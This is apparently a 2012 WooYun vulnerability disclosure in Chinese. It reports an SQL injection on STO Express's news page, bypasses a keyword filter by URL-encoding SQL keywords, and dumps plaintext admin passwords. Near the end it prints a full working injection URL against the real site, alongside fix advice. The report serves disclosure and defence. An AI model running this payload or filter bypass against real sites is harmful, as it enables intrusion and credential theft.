漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-014757
漏洞标题:申通快递管网绕过waf继续注入
相关厂商:申通快递
漏洞作者: 老衲要还俗
提交时间:2012-11-14 11:33
修复时间:2012-12-29 11:34
公开时间:2012-12-29 11:34
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-11-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-12-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
该漏洞曾在 http://www.wooyun.org/bugs/wooyun-2010-05046 报告过,官方进行了修复,有防注或waf类产品,但经测试可以绕过继续利用。
详细说明:
http://www.sto.cn/news_details.asp
文件存在数字型注入漏洞,经过测试可以直接爆出管理员的账户和密码
文件对一些 and select from 语句进行了过滤,但是过滤不完整。我把and select from 转换成 url编码之后,便进行了绕过防注入。最后拿到后台登入账户和密码,最重要的是密码是明文的,没有经过加密!
漏洞证明:
修复方案:
在注入漏洞的防范最有效的方法是分别接受的数据类型进行处理,news_details.asp文件的属于数字型注入漏洞,把接收到的数据使用cint()函数进行转换。这样漏洞的修复才算是完美了。不建议使用黑名单的方式进行过滤!而且密码建议进行加密处理
猜用户密码:
http://www.sto.cn/news_details.asp?id=-101489 union %73%65%6C%65%63%74 1,%67%72%6F%75%70%5F%63%6F%6E%63%61%74(mima),3,4,5,6,7,8 %66%72%6F%6D yonghu
版权声明:转载请注明来源 老衲要还俗@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝